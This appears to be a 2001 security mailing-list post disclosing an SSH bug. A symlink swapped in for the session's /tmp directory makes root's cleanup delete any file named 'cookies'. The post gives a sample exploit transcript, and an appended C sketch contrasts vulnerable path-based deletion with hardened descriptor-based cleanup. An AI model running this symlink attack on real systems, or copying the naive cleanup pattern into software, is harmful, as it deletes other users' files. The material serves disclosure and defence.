SSH allows deletion of other users' files...

From: zen-parseat_private
Date: Mon Jun 04 2001 - 03:14:29 PDT


    SSH allows deletion of other users' files.
    ==========================================
    
    You can delete any file on the filesystem you want...
    
    as long as it's called cookies.
    
    
    Not really a very useful bug, but could cause annoyances to
    people who actually like their cookies.
    
     /home/zen/.netscape/cookies
    
    sample exploit:-
    
     [root@clarity /root]# touch /cookies;ls /cookies
     /cookies
     [root@clarity /root]# ssh zen@localhost
     zen@localhost's password:
     Last login: Mon Jun  4 20:22:39 2001 from localhost.local
     Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
     [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
     [zen@clarity zen]$ logout
     Connection to localhost closed.
     [root@clarity /root]# ls /cookies
     /bin/ls: /cookies: No such file or directory
    
    
    --zen-parse
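
The transcript above works because a privileged cleanup step removes `cookies` by path after the user has replaced the session directory with a symlink. The C sketch below is an added example, not code from the original post or from any SSH implementation: it contrasts a path-based delete with one that pins the directory by descriptor and refuses a symlink in its place. The function names and the scratch directory layout are hypothetical and constructed for the demonstration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Path-based cleanup: dir is resolved again at unlink time, so a symlink
 * swapped in for dir redirects the delete to the link target. */
static int naive_cleanup(const char *dir, const char *name) {
    char path[512];
    snprintf(path, sizeof path, "%s/%s", dir, name);
    return unlink(path);
}

/* Hardened cleanup: pin the directory with a descriptor, refuse a symlink in
 * its place, check its owner, then unlink relative to the descriptor. */
static int safe_cleanup(const char *dir, const char *name, uid_t owner) {
    struct stat st;
    int rc = -1;
    int fd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;                  /* symlink, missing, or not a dir */
    if (fstat(fd, &st) == 0 && st.st_uid == owner)
        rc = unlinkat(fd, name, 0);         /* never re-resolves dir by name */
    close(fd);
    return rc;
}

/* Constructed scenario: "session" plays the replaced /tmp/ssh-XXXX directory,
 * "victim" plays the link target. Returns 1 if victim/cookies survived. */
static int cookies_survive(int use_safe, int via_link) {
    char base[] = "/tmp/cleanup-demo-XXXXXX", victim[128], sess[128], file[256];
    if (!mkdtemp(base)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(sess, sizeof sess, "%s/session", base);
    snprintf(file, sizeof file, "%s/cookies", victim);
    if (mkdir(victim, 0700) || symlink(victim, sess)) return -1;
    int fd = open(file, O_CREAT | O_WRONLY, 0600);
    if (fd < 0 || close(fd)) return -1;
    if (use_safe) safe_cleanup(via_link ? sess : victim, "cookies", getuid());
    else naive_cleanup(via_link ? sess : victim, "cookies");
    int survived = access(file, F_OK) == 0;
    unlink(file); unlink(sess); rmdir(victim); rmdir(base);
    return survived;
}

int main(void) {
    printf("naive: %d, hardened: %d\n", cookies_survive(0, 1), cookies_survive(1, 1));
    return 0;
}
```

Performing the cleanup with the logged-in user's privileges rather than root's closes the same hole from the other side, since the delete then cannot reach files the user could not remove anyway.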
    


